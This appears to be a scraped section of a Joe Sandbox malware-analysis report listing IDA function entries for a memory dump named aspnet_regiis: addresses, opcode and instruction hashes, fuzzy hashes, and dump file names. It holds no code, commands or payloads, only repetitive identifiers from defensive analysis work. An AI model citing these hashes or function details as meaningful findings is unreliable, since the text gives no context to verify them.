                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: N&
                                                                                                                                                                                                                                                                  • API String ID: 0-3274356042
                                                                                                                                                                                                                                                                  • Opcode ID: ddd590e5cf2b373994aee65aeb95e1ae3a502ab3e3598ac9c55f56b91cef4bf7
                                                                                                                                                                                                                                                                  • Instruction ID: a26f26e550687c8f97f70232e13719fbd6ef89558e5ea2fa40d8793d627fe097
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ddd590e5cf2b373994aee65aeb95e1ae3a502ab3e3598ac9c55f56b91cef4bf7
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6E51E721604B804BD72ACA3ECC513B7BBE3ABE7314B58969DC4D7C7686CA3CE0068714
                                                                                                                                                                                                                                                                  Function 72C6FA20 Relevance: .7, Instructions: 685COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 1225c30d5b12f5f095e44229d0dab9cfbd470f3fad252b00fb9b6ea472225764
                                                                                                                                                                                                                                                                  • Instruction ID: b31a8476859fb551f07b8eb1c201000f2a3e51c308016c5d1c0738506dac7293
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1225c30d5b12f5f095e44229d0dab9cfbd470f3fad252b00fb9b6ea472225764
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0E220136B54251CFD708CF79C8E02AAB7A2FB99314F2E8A7DC94697341D7359845CB80
                                                                                                                                                                                                                                                                  Function 72C373D0 Relevance: .6, Instructions: 625COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 297f4b89197acb61c5065d7b64ae3ffd4d1c515c5471772b9ed6b68c66622cb9
                                                                                                                                                                                                                                                                  • Instruction ID: ff7a38e15b210c97e1fbd391f4b1238bea3a3502e8e2facbcc031cfd15bd256d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 297f4b89197acb61c5065d7b64ae3ffd4d1c515c5471772b9ed6b68c66622cb9
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7C22C332A083118BC326DF1CD9816ABB3F2AFD6319F558E2DD9C697246D734A419CB43
                                                                                                                                                                                                                                                                  Function 72C6FB10 Relevance: .5, Instructions: 537COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: edd3fb7b76655d9b08f31fcd75ee3bda2444b7d2db503804ad3f3b640c5d044d
                                                                                                                                                                                                                                                                  • Instruction ID: 451912b29eebd121552da94345205bed2d5d5415acd74cbaa561b9d4a2d6bafa
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: edd3fb7b76655d9b08f31fcd75ee3bda2444b7d2db503804ad3f3b640c5d044d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B002F336B54251CFD708CF79C8E02AAB7A2FB99314F2E8A7DC94697341D735A845CB80
                                                                                                                                                                                                                                                                  Function 72C6FB2A Relevance: .5, Instructions: 527COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 9f359283a51ab35cf4d01c669b736217816154f54a8df01bb5849062b5445336
                                                                                                                                                                                                                                                                  • Instruction ID: 59b52be2eccb30522afe6de5ffb63764b9b61cb35bb87e839d6f892c35af5237
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9f359283a51ab35cf4d01c669b736217816154f54a8df01bb5849062b5445336
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3BF1F336B54251CFD708CF79C8E02AAB7A2FB99315F2E8A7DC94693341D735A845CB80
                                                                                                                                                                                                                                                                  Function 72C6FB28 Relevance: .5, Instructions: 526COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 9cfd2b797c6307842c4366e8958987f41cedcd780961bb78b5ebd0edf5d955af
                                                                                                                                                                                                                                                                  • Instruction ID: fd97a8c4d2794501431f8e14e39f8262979a58448a0435d8c93b7672d29dffec
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9cfd2b797c6307842c4366e8958987f41cedcd780961bb78b5ebd0edf5d955af
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 19F1F336B54251CFD708CF79C8E02AAB7A2FB99315F2E8A7DC94693341D7359845CB80
                                                                                                                                                                                                                                                                  Function 72C4D8D8 Relevance: .5, Instructions: 499COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 6c9edb52b36d0922e16ba6a96c697fb69b1cc82f07aef5d2d82506ec0debb7ed
                                                                                                                                                                                                                                                                  • Instruction ID: 80775a4d66ff7f3a43e130bcc33ed475b38d156faee2224ec5a9a6bd75074e7e
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6c9edb52b36d0922e16ba6a96c697fb69b1cc82f07aef5d2d82506ec0debb7ed
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D1E115B1A00215CFCB14CF6DC8517BBBBB1FF5A310B14565CE892AB395E734A912CB94
                                                                                                                                                                                                                                                                  Function 72C66210 Relevance: .1, Instructions: 64COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                                                                                                                  • Instruction ID: a26885ec9c31c432b6ebb791d646c1b87659e6555a027d056f248e4f034d47d0
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1611E933A051D40ED3128D3D8480575BFF30AE3634B29439DF4B99B2D6D6268D8B8390
                                                                                                                                                                                                                                                                  Function 72C5AAC0 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 7b5d740ace398df56c1bc651b30677a1090a792db8fb55b3a5b1b7746f8ad41c
                                                                                                                                                                                                                                                                  • Instruction ID: 60224ad1a7cf9c2ac8d3ac8e7eed38d170d8b361f20b4f166a918f7cfcf20c19
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7b5d740ace398df56c1bc651b30677a1090a792db8fb55b3a5b1b7746f8ad41c
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B9019EB160070597E6118E1FD5C0B27B6BA6FA5708F28042CE80787301EB76E8098AAA
                                                                                                                                                                                                                                                                  Function 72C4C300 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: d915abd692c596d351a76ef7c44155bf2f7634e88133afcabaf1f94f6f3ee80c
                                                                                                                                                                                                                                                                  • Instruction ID: d3bd9c844f43136b87188ccf00dea569b272b483eb3ae9966e9e13c5e9ac3489
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d915abd692c596d351a76ef7c44155bf2f7634e88133afcabaf1f94f6f3ee80c
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CFF04460104B914AD3328F39C5243A3BFF09F2321CF542A8CC5D7576E2D776E10A8798
                                                                                                                                                                                                                                                                  Function 72C5E0DA Relevance: .0, Instructions: 38COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: a74d5857912f424093c70e21deeb6922a10a882864307659604c18145d6e58bc
                                                                                                                                                                                                                                                                  • Instruction ID: 190db2f54bf8934c4cd2efffe8f83a59de6cf40248b7a73a2d57218dfac670ea
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a74d5857912f424093c70e21deeb6922a10a882864307659604c18145d6e58bc
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5CF030104087E28AD7174A3F89607A3AFE19BA3021B241BD5C8F29B2CBC215D097C3A9
                                                                                                                                                                                                                                                                  Function 72C62A42 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 72COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Variant$ClearInit
                                                                                                                                                                                                                                                                  • String ID: C$C$P$T
                                                                                                                                                                                                                                                                  • API String ID: 2610073882-3051599793
                                                                                                                                                                                                                                                                  • Opcode ID: 6ad76f1a5535b822f79293fae76517af97870f7b8dbe3a15fbbab24a5a3246da
                                                                                                                                                                                                                                                                  • Instruction ID: faafa1809ca61f4a907b4926b04c391afb57e7550de5d33ba98e9cc2c3b1b48d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6ad76f1a5535b822f79293fae76517af97870f7b8dbe3a15fbbab24a5a3246da
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2D41C32010C7C18AD372DB38845979FBFE16BA6224F488A9DD4ED8B3D2DB754049DB63